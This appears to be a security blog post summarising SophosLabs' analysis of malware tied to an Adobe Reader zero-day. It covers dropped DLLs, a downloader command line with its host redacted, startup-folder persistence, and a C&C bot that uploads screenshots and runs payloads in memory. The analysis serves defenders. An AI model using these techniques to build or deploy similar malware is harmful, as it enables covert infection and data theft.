Adobe Zero-Day Malware Stripped by SophosLabs


A day has gone by since Fireeye Security Firm claimed to have discovered a zero-day vulnerability affecting Adobe Reader and Acrobat XI softwares. According to Fireeye;


Upon successful exploitation, it will drop two DLLs. The first DLL shows a fake error message and opens a decoy PDF document, which is usually common in targeted attacks. The second DLL in turn drops the callback component, which talks to a remote domain.

Abode, in turn, began to investigate this highly-crucial and exasperating matter. The investigation led to an interesting development when SophosLabs was contacted by the concerned companies to do a little digging on their part into the malware. SophosLabs' Gabor Szappanos and Peter Szabo share their intriguing findings.


The duo begins by saying, "It seems as though we jumped right into the middle of the development and testing phase of the project," which must refer to the after-math of the exploit.

Gabor and Peter tell us that they discovered a "targeted malware tested, a zero-day vulnerability and some digitally signed malware". These files were different from the rest in terms of how they implemented exploits. These files did not use anti-debugging and anti-anti-virus tricks. The malware consisted of "debug builds with debug paths stored in each component". The pathnames seemed to indicate that the files were a part of a classified operation. This technique of deception was to create confusion in the masses; we are certain that a "classified" operation would be a bit more "classified" than what we see here.



This, seemingly, was a "testing rig operated by a criminal gang to field-test its latest creation". And the malware it comprised off has been seen before and detected by Kaspersky Labs. 

Discovery of Malware Components

 The attack begins when the attacker emails the victim with a link that the victim will be sure to click on. The link leads to a string of malicious components hosted on a server in Turkey. Your computer is then hacked with an Adobe Flash exploit. The incomplete codes and the unusual malware suggests that the cybercrime gang isn't quite done with this particular attack. But SophosLabs managed to contemplate the malware in its entirety. The attack is carried out by first dropping a number of malicious files onto your computer:
  1. A downloader program, packaged in a file called scode.dll dropped into a directory that's part of your Flash installation, where Flash expects and looks for add-in code
  2. A shellcode file called scodeexp.txt. (This file is specific to the Windows XP platform.)
  3. A shellcode file called scode.txt. (This is for computers not running XP.) 
Sophos products detect these files as Troj/FSBSpy-A.

The Attack Continues

And the party commences:
  1. The shellcode loads the scode.dll to take over the dirty work. (A DLL is really just an executable file in a special format.)
  2. The DLL contains an embedded EXE file, which it drops into the temporary folder with the bogus name taskmgr.exe.
  3. The DLL launches the newly-dropped taskmgr program with the command line dl http://www.[redacted]/ explorer.exe.
According to SophosLab this is How the Malware Operates;


The bogus taskmgr executable isn't particularly ambitious. It doesn't check that the first parameter is dl, merely that there is one, and it doesn't bother checking to see if its second parameter really is a URL.

It simply downloads whatever it can from the URL it was given, saving it into the temporary folder and launching it. We're still not done. When the bogus explorer.exe runs, it copies itself to the startup folder, choosing the rather less dubious name IAStorIcon.exe. Now, of course, you're actively infected, and the infection is persistent. (That is a fancy way of saying that your malware survives between logins or reboots, rather than expiring at the end of the current user's session.)

The downloader components were compiled in debug mode, so they contain references to PDB files. PDB stands for Program Database, which is where symbolic information about the program is stored.You don't usually ship debugging information with your software. Firstly, it gives away intimate information about its internals; secondly, it greatly increases the size of your shipping code.The names of the PDB files are interesting:

C:\ClassifiedProjects\ ProjectDefense\ Firefox­Binary­Loaded­WithCertificate\ Loader­FirefoxSigned\ Loader­ReleaseFinalCERT.pdb(in the dropper DLL).
C:\Classified\ Investigations\ National­Security\ sco.pdb (in the dropper EXE).

As we mentioned above, the names are not merely suggestive of a classified security operation, but indeed overly suggestive. It seems unlikely that such an operation would use such obvious filenames, so they're probably just a smokescreen of sorts.



The malware itself, explorer.exe, is digitally signed with a valid certificate, or at least with a certificate that isn't merely home made, and hasn't expired.Sophos products detect files signed with this certificate as Troj/FSBSpy-B, and SophosLabs telemetry indicates that there are at least three more related pieces of malware currently detected in the wild. 

What the Malware does:

The explorer.exe program is a bot (zombie malware). It contacts a Command and Control server using a fixed IP number. This IP belongs to a hosting solution provider in Netherlands.

The malware has three primary objectives:


  1. It retrieves a basic system inventory.
  2. It can be remotely commanded to take and upload screenshots.
  3. It can be remotely commanded to download and run new malware.

The bot's handling of new malware downloads is sophisticated as these never appear as files on the disk hence, making them trickier to spot.

According to SophosLab;

The explorer.exe bot has a built-in program loader that constructs an executable software image directly in memory. This loader handles function imports, relocations and more, just like the operating system does when it loads a program from disk.

Once the new malware download has been built in an executable image in memory, it is called directly. No separate process or thread is created.

 What the Malware Steals:


1.            CPU type
2.            memory size
3.            disk size
4.            free disk space
5.            Windows version
6.            registration details
7.            user information
8.            timezone
9.            SID and
10.        a list of installed applications.

The gurus write;

Communications with the C&C server, including uploads and downloads, are encrypted using the AES algorithm; the encryption key is embedded into the bogus explorer.exe.The malware also contains code to find files named *tmp in the temporary folder and upload them. However, this code is never used - another indication that the malware is incomplete.


Lastly, the malware is full of debug messages. Indeed, if it is running from process ID 4 (the System process), it annotates its progress with a chatty sequence of alerts, such as I'm going to start the program, in pop-up message boxes.
Cheers!

About The Author
This article is written by Sindhia Javed Junejo. She is one of the core members of RHA team.